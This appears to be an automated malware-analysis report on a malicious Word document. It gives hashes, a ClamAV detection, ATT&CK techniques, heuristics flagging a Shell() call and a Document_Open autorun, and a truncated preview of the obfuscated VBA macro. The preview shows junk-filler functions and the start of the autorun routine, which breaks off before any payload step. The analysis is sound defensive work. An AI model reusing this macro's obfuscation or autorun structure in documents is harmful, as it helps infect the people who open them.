Office (OLE) malware analysis — malicious · 9914881d35a7fa7c

MALICIOUS

Office (OLE)

152.8 KB Created: 2018-07-23 11:08:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: c78f61661d9bcd1a52d7f0b289ace4a4 SHA-1: b34b955b41476d293fdec803163ba41c49ac2194 SHA-256: 9914881d35a7fa7ce6f9ec06d4e5c19f12c6916a57fcc4facbb28f144e921283

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro and a 'Shell()' call indicate that the macros are designed to execute arbitrary code upon opening. This is a common technique for downloading and executing further malicious payloads, hence the high confidence in this attack pattern. The ClamAV detection name provides a specific identifier for this threat.

Heuristics 5

ClamAV: Doc.Malware.Valyria-10026440-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-10026440-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29534 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29534 bytes
SHA-256: `1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mVMLiwfHzQGmN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function DqGrcBsalmcUp() On Error Resume Next If HlPMG Xor 11 Then ElseIf OfOpP Eqv dKPwb Then If dWETnc = lBSAVo Then GEzZJ = Oct(STdfwX * 41517) End If End If If dBprN Xor 11 Then ElseIf JEozm Eqv UAvftB Then If KZNpmr = KtZXQG Then RXRLd = Oct(rzzIbW * 4692) End If End If If Truqnu Xor 11 Then ElseIf ChnwNp Eqv LznMI Then If DHznv = hVYKml Then fHNTYB = Oct(AJrjzW * 52570) End If End If If hACWV Xor 11 Then ElseIf uQLDA Eqv OPfRhj Then If DciTP = INaEOP Then dqMYUt = Oct(QWHFIc * 78715) End If End If If SDlhBr Xor 11 Then ElseIf ZUYTz Eqv QiANH Then If pimowS = NEKYwZ Then rLLNl = Oct(woQlTI * 4604) End If End If End Function Private Function UQjFdMtH() On Error Resume Next If iKYVLU <= GqVAr Then Set kLtVb = PJTpTl cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs) End If If tFsdQd <= BiGTT Then Set VltERT = ERAzvZ UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD) End If If FIijw Xor 11 Then ElseIf RVQivN Eqv fGJHRd Then If kzCrO = lDlFoa Then jQwqSw = Oct(tIwojS * 76101) End If End If If MUdWBK Xor 11 Then ElseIf JMziPK Eqv XtPQp Then If XiZQp = EZBuU Then iMWff = Oct(fmnSq * 97927) End If End If If WRrGJ <= DzPIVu Then Set zbWvh = ZbAco NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv) End If End Function Private Function YSTjndVYH() On Error Resume Next If ADPCwX Xor 11 Then ElseIf iznrGt Eqv QRDNo Then If QJXBYV = uIRXLz Then zhnLsi = Oct(ofPNp * 88771) End If End If If flIGO Xor 11 Then ElseIf VKjKBj Eqv GWWoiL Then If utzfm = tYsjY Then ioqwB = Oct(OModO * 97741) End If End If If ttFjWc Xor 11 Then ElseIf jNidpz Eqv jPjHT Then If iirVF = cdHnia Then wPXRb = Oct(wFAahO * 86621) End If End If If wrcAmL Xor 11 Then ElseIf NEqBc Eqv GCfLs Then If RamjQS = CDQKnQ Then sWVGC = Oct(uIDJn * 12894) End If End If If tjFocE Xor 11 Then ElseIf LLHLir Eqv AwuDk Then If MjhZI = iJXdw Then nwJUK = Oct(KMcjK * 25732) End If End If If zzhib Xor 11 Then ElseIf NPCki Eqv zOYZvC Then If BKIwEi = MiDJG Then QNiIG = Oct(zlkAV * 64745) End If End If If CLdaX Xor 11 Then ElseIf NBUSF Eqv CnmZGV Then If dHTOq = QSwlCO Then GIWdCF = Oct(nwMLwT * 46038) End If End If End Function Private Function wrzHrQbvhRSf() On Error Resume Next If sIzRMo Xor 11 Then ElseIf LVLEh Eqv wIrdQJ Then If IBTYu = FrPnK Then OVqLd = Oct(ZKnNj * 88657) End If End If If nCNhD Xor 11 Then ElseIf ZalrpZ Eqv Ljjwh Then If DSIHw = Hrzcu Then ZhVNC = Oct(ikUbnk * 98644) End If End If If OPoWC Xor 11 Then ElseIf scGLwP Eqv FDCMMb Then If mpHnU = dPBjzl Then YnwHK = Oct(pjfTz * 18218) End If End If If zNaHR Xor 11 Then ElseIf toGiuQ Eqv vwZwr Then If PsAzj = Nwjbi Then IaKId = Oct(UcVjt * 29164) End If End If If zpbolu Xor 11 Then ElseIf cSQBIa Eqv DYTBSF Then If oUQkE = jUanl Then KZBFvG = Oct(AVYjF * 67510) End If End If End Function Private Sub Document_open() On Error Resume Next If ltMnWY Xor iCwVIY Then For BkhpY = 22 To Jqsfr kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva ... (truncated)

SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.